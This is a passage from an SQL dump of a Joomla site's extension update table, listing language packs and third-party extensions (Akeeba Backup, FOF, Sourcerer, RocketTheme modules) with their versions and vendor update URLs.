Simplified','','pkg_zh-CN','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(16293,57,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(16294,57,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(16295,57,0,'Danish','','pkg_da-DK','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(16296,57,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.19.2','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(16297,57,0,'Estonian','','pkg_et-EE','package','',0,'3.9.14.2','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(16298,57,0,'Italian','','pkg_it-IT','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(16299,57,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(16300,57,0,'Persian','','pkg_fa-IR','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(16301,57,0,'Polish','','pkg_pl-PL','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(16302,57,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(16303,57,0,'Russian','','pkg_ru-RU','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(16304,57,0,'English AU','','pkg_en-AU','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(16305,57,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(16306,57,0,'English US','','pkg_en-US','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(16307,57,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(16308,57,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(16309,57,0,'Thai','','pkg_th-TH','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(16310,57,0,'Ukrainian','','pkg_uk-UA','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/uk-UA_details.xml','',''),(16311,57,0,'Uyghur','','pkg_ug-CN','package','',0,'3.7.5.2','','https://update.joomla.org/language/details3/ug-CN_details.xml','',''),(16312,57,0,'German DE','','pkg_de-DE','package','',0,'3.9.19.2','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(16313,57,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(16314,57,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(16315,57,0,'Spanish','','pkg_es-ES','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(16316,57,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(16317,57,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(16318,57,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(16319,57,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(16320,57,0,'English CA','','pkg_en-CA','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(16321,57,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(16322,57,0,'Dari Persian','','pkg_prs-AF','package','',0,'3.4.4.3','','https://update.joomla.org/language/details3/prs-AF_details.xml','',''),(16323,57,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(16324,57,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(16325,57,0,'German CH','','pkg_de-CH','package','',0,'3.9.19.2','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(16326,57,0,'German AT','','pkg_de-AT','package','',0,'3.9.19.2','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(16327,57,0,'German LI','','pkg_de-LI','package','',0,'3.9.19.2','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(16328,57,0,'German LU','','pkg_de-LU','package','',0,'3.9.19.2','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(16329,57,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(16330,57,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.17.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(16331,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'7.1.4','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','\n					https://www.akeebabackup.com/download/akeeba-backup/7-1-4.html\n				',''),(16332,76,0,'Akeeba Frontend Framework (FEF)','Akeeba Frontend Framework (FEF)','file_fef','file','',1,'1.0.12','','http://cdn.akeebabackup.com/updates/fef.xml','\n					https://www.akeebabackup.com/download/fef/1-0-12.html\n				',''),(16333,93,0,'Regular Labs - Sourcerer','','sourcerer','plugin','system',0,'8.2.2FREE','','https://download.regularlabs.com/updates.xml?e=sourcerer&type=.xml','https://www.regularlabs.com/extensions/sourcerer#download',''),(16334,101,0,'FOF 3.x Stable','FOF 3.x Stable','lib_fof30','library','',1,'3.5.4','','http://cdn.akeebabackup.com/updates/fof3_file.xml','\n					https://www.akeebabackup.com/download/fof3/3-5-4.html\n				',''),(16335,1,0,'Joomla','','joomla','file','',0,'3.9.19','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(16336,1,0,'Joomla','','joomla','file','',0,'3.9.19','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(16337,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'7.1.4','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','\n					https://www.akeebabackup.com/download/akeeba-backup/7-1-4.html\n				',''),(16338,1,0,'Joomla','','joomla','file','',0,'3.9.19','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(16339,1,0,'Joomla','','joomla','file','',0,'3.9.19','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(16340,1,0,'Joomla','','joomla','file','',0,'3.9.19','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(16341,1,0,'Joomla','','joomla','file','',0,'3.9.19','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(16342,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'7.1.4','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','\n					https://www.akeebabackup.com/download/akeeba-backup/7-1-4.html\n				',''),(16343,1,0,'Joomla','','joomla','file','',0,'3.9.19','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(16344,3,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(16345,3,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.19.2','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(16346,3,0,'French','','pkg_fr-FR','package','',0,'3.9.19.2','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(16347,3,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(16348,3,0,'Greek','','pkg_el-GR','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(16349,3,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(16350,3,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(16351,3,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(16352,3,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(16353,3,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.11.2','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(16354,3,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(16355,3,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.19.2','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(16356,3,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(16357,3,0,'Danish','','pkg_da-DK','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(16358,3,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.19.2','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(16359,3,0,'Estonian','','pkg_et-EE','package','',0,'3.9.14.2','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(16360,3,0,'Italian','','pkg_it-IT','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(16361,3,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(16362,3,0,'Persian','','pkg_fa-IR','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(16363,3,0,'Polish','','pkg_pl-PL','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(16364,3,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(16365,3,0,'Russian','','pkg_ru-RU','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(16366,3,0,'English AU','','pkg_en-AU','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(16367,3,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(16368,3,0,'English US','','pkg_en-US','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(16369,3,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(16370,3,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(16371,3,0,'Thai','','pkg_th-TH','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(16372,3,0,'Ukrainian','','pkg_uk-UA','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/uk-UA_details.xml','',''),(16373,3,0,'Uyghur','','pkg_ug-CN','package','',0,'3.7.5.2','','https://update.joomla.org/language/details3/ug-CN_details.xml','',''),(16374,3,0,'German DE','','pkg_de-DE','package','',0,'3.9.19.2','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(16375,3,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(16376,3,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(16377,3,0,'Spanish','','pkg_es-ES','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(16378,3,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(16379,3,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(16380,3,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(16381,3,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(16382,3,0,'English CA','','pkg_en-CA','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(16383,3,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(16384,3,0,'Dari Persian','','pkg_prs-AF','package','',0,'3.4.4.3','','https://update.joomla.org/language/details3/prs-AF_details.xml','',''),(16385,3,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(16386,3,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(16387,3,0,'German CH','','pkg_de-CH','package','',0,'3.9.19.2','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(16388,3,0,'German AT','','pkg_de-AT','package','',0,'3.9.19.2','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(16389,3,0,'German LI','','pkg_de-LI','package','',0,'3.9.19.2','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(16390,3,0,'German LU','','pkg_de-LU','package','',0,'3.9.19.2','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(16391,3,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(16392,3,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.17.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(16393,20,0,'RokSprocket Module','','mod_roksprocket','module','',0,'2.1.28','0802','http://updates.rockettheme.com/joomla/138/b61e70db','',''),(16394,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/138/2084920890','',''),(16395,20,0,'RokGallery Extension','','mod_rokgallery','module','',0,'2.46','0802','http://updates.rockettheme.com/joomla/286/21ffe006','',''),(16396,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/286/326466299','',''),(16397,20,0,'RokWeather','','','module','',0,'2.0.4','0802','http://updates.rockettheme.com/joomla/313/1307741342','',''),(16398,20,0,'RokMiniEvents','','','module','',0,'3.0.3','0802','http://updates.rockettheme.com/joomla/313/1301311221','',''),(16399,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/381/337128173','',''),(16400,20,0,'RokCommon','','pkg_rokcommon','package','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/559/1033ef39','',''),(16401,57,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(16402,57,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.19.2','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(16403,57,0,'French','','pkg_fr-FR','package','',0,'3.9.19.2','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(16404,57,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(16405,57,0,'Greek','','pkg_el-GR','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(16406,57,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(16407,57,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(16408,57,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(16409,57,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(16410,57,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.11.2','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(16411,57,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(16412,57,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.19.2','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(16413,57,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(16414,57,0,'Danish','','pkg_da-DK','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(16415,57,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.19.2','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(16416,57,0,'Estonian','','pkg_et-EE','package','',0,'3.9.14.2','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(16417,57,0,'Italian','','pkg_it-IT','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(16418,57,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(16419,57,0,'Persian','','pkg_fa-IR','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(16420,57,0,'Polish','','pkg_pl-PL','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(16421,57,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(16422,57,0,'Russian','','pkg_ru-RU','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(16423,57,0,'English AU','','pkg_en-AU','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(16424,57,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(16425,57,0,'English US','','pkg_en-US','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(16426,57,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(16427,57,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(16428,57,0,'Thai','','pkg_th-TH','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(16429,57,0,'Ukrainian','','pkg_uk-UA','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/uk-UA_details.xml','',''),(16430,57,0,'Uyghur','','pkg_ug-CN','package','',0,'3.7.5.2','','https://update.joomla.org/language/details3/ug-CN_details.xml','',''),(16431,57,0,'German DE','','pkg_de-DE','package','',0,'3.9.19.2','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(16432,57,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(16433,57,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(16434,57,0,'Spanish','','pkg_es-ES','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(16435,57,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(16436,57,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(16437,57,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(16438,57,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(16439,57,0,'English CA','','pkg_en-CA','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(16440,57,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(16441,57,0,'Dari Persian','','pkg_prs-AF','package','',0,'3.4.4.3','','https://update.joomla.org/language/details3/prs-AF_details.xml','',''),(16442,57,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(16443,57,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(16444,57,0,'German CH','','pkg_de-CH','package','',0,'3.9.19.2','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(16445,57,0,'German AT','','pkg_de-AT','package','',0,'3.9.19.2','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(16446,57,0,'German LI','','pkg_de-LI','package','',0,'3.9.19.2','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(16447,57,0,'German LU','','pkg_de-LU','package','',0,'3.9.19.2','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(16448,57,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(16449,57,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.17.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(16450,76,0,'Akeeba Frontend Framework (FEF)','Akeeba Frontend Framework (FEF)','file_fef','file','',1,'1.0.12','','http://cdn.akeebabackup.com/updates/fef.xml','\n					https://www.akeebabackup.com/download/fef/1-0-12.html\n				',''),(16451,93,0,'Regular Labs - Sourcerer','','sourcerer','plugin','system',0,'8.2.2FREE','','https://download.regularlabs.com/updates.xml?e=sourcerer&type=.xml','https://www.regularlabs.com/extensions/sourcerer#download',''),(16452,101,0,'FOF 3.x Stable','FOF 3.x Stable','lib_fof30','library','',1,'3.5.4','','http://cdn.akeebabackup.com/updates/fof3_file.xml','\n					https://www.akeebabackup.com/download/fof3/3-5-4.html\n				',''),(16453,1,0,'Joomla','','joomla','file','',0,'3.9.19','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(16454,1,0,'Joomla','','joomla','file','',0,'3.9.19','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(16455,1,0,'Joomla','','joomla','file','',0,'3.9.19','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(16456,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'7.1.4','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','\n					https://www.akeebabackup.com/download/akeeba-backup/7-1-4.html\n				',''),(16457,1,0,'Joomla','','joomla','file','',0,'3.9.19','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(16458,1,0,'Joomla','','joomla','file','',0,'3.9.19','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(16459,1,0,'Joomla','','joomla','file','',0,'3.9.19','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(16460,1,0,'Joomla','','joomla','file','',0,'3.9.19','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(16461,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'7.1.4','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','\n					https://www.akeebabackup.com/download/akeeba-backup/7-1-4.html\n				',''),(16462,1,0,'Joomla','','joomla','file','',0,'3.9.19','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(16463,1,0,'Joomla','','joomla','file','',0,'3.9.19','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(16464,1,0,'Joomla','','joomla','file','',0,'3.9.19','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(16465,1,0,'Joomla','','joomla','file','',0,'3.9.19','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(16466,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'7.1.4','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','\n					https://www.akeebabackup.com/download/akeeba-backup/7-1-4.html\n				',''),(16467,3,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(16468,3,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.19.2','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(16469,3,0,'French','','pkg_fr-FR','package','',0,'3.9.19.2','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(16470,3,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(16471,3,0,'Greek','','pkg_el-GR','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(16472,3,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(16473,3,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(16474,3,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(16475,3,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(16476,3,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.11.2','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(16477,3,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(16478,3,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.19.2','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(16479,3,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(16480,3,0,'Danish','','pkg_da-DK','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(16481,3,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.19.2','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(16482,3,0,'Estonian','','pkg_et-EE','package','',0,'3.9.14.2','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(16483,3,0,'Italian','','pkg_it-IT','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(16484,3,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(16485,3,0,'Persian','','pkg_fa-IR','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(16486,3,0,'Polish','','pkg_pl-PL','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(16487,3,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(16488,3,0,'Russian','','pkg_ru-RU','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(16489,3,0,'English AU','','pkg_en-AU','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(16490,3,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(16491,3,0,'English US','','pkg_en-US','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(16492,3,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(16493,3,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.19.2','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(16494,3,0,'Thai','','pkg_th-TH','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(16495,3,0,'Ukrainian','','pkg_uk-UA','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/uk-UA_details.xml','',''),(16496,3,0,'Uyghur','','pkg_ug-CN','package','',0,'3.7.5.2','','https://update.joomla.org/language/details3/ug-CN_details.xml','',''),(16497,3,0,'German DE','','pkg_de-DE','package','',0,'3.9.19.2','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(16498,3,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(16499,3,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(16500,3,0,'Spanish','','pkg_es-ES','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(16501,3,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(16502,3,0,'Serbian 